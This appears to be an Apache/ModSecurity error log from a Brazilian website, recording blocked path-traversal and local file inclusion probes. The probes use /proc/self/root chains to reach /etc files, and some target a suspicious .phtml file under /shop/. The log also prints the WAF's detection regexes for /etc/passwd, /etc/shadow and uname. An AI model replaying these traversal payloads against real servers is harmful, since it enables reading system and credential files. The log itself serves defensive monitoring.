[Thu Mar 19 16:03:09.107034 2026] [:error] [pid 7545:tid 140411540502272] [client 74.7.243.128:60918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIbX8B84UptSoTJtY0bgAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:12.767206 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:33630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIcPXLqtnMIWvjpaJCtgAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:18.959974 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:33634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIduoXxyEfFpUF8f8xCgAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:21.966538 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:37000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIefXLqtnMIWvjpaJCvAAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:26.406251 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:37010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIfeoXxyEfFpUF8f8xEwAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:30.133808 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51932] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:03:30.583640 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:43166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIgvu8EFLIOrSqIpvNzAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:33.657678 2026] [:error] [pid 17653:tid 140411708356352] [client 57.141.18.45:55332] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIhcdf6f5d65gmYZSfhQAAAsQ"]
[Thu Mar 19 16:03:34.339469 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:43176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIhhCii7xarUs8iHYOnQAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:35.314566 2026] [:error] [pid 19655:tid 140411733534464] [client 57.141.18.109:55386] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIh01ujooLWdUDGy75bwAAAEE"]
[Thu Mar 19 16:03:38.251033 2026] [:error] [pid 20435:tid 140411674785536] [client 74.7.243.128:43180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIiZJaM1-0uhhUQJM9OQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:40.313410 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:43444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIjMdf6f5d65gmYZSfiAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:40.700056 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.15:55544] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIjOoXxyEfFpUF8f8xGAAAAU8"]
[Thu Mar 19 16:03:43.132286 2026] [:error] [pid 20435:tid 140411649607424] [client 74.7.243.128:43448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIj5JaM1-0uhhUQJM9PAAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:43.269420 2026] [:error] [pid 5816:tid 140411725141760] [client 57.141.18.11:55624] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIj5fmNfuxceSuAEK52QAAAcI"]
[Thu Mar 19 16:03:46.094650 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:43450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIkgkwaGbbGflqUZDvwwAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:47.171038 2026] [:error] [pid 27293:tid 140411574073088] [client 57.141.18.79:55752] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIk_-YZRR_7pZ7nDKvWgAAA9Q"]
[Thu Mar 19 16:03:47.984814 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.38:55776] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIk_XLqtnMIWvjpaJC0AAAApQ"]
[Thu Mar 19 16:03:49.323175 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:43458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIlcdf6f5d65gmYZSfjQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:52.045840 2026] [proxy_fcgi:error] [pid 21219:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52644] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:03:53.061959 2026] [:error] [pid 17887:tid 140411699963648] [client 57.141.18.35:55922] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxImQkwaGbbGflqUZDvxQAAAMU"]
[Thu Mar 19 16:03:54.523288 2026] [:error] [pid 30077:tid 140411674785536] [client 57.141.18.38:55970] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxImvu8EFLIOrSqIpvN2QAAAkg"]
[Thu Mar 19 16:03:56.146381 2026] [:error] [pid 5816:tid 140411725141760] [client 74.7.243.128:41076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxInJfmNfuxceSuAEK55gAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:59.993077 2026] [:error] [pid 19655:tid 140411708356352] [client 74.7.243.128:41084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIn01ujooLWdUDGy75gQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:00.517330 2026] [:error] [pid 19655:tid 140411733534464] [client 74.7.243.128:41084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIoE1ujooLWdUDGy75ggAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:02.524653 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:56800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIohCii7xarUs8iHYOtQAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
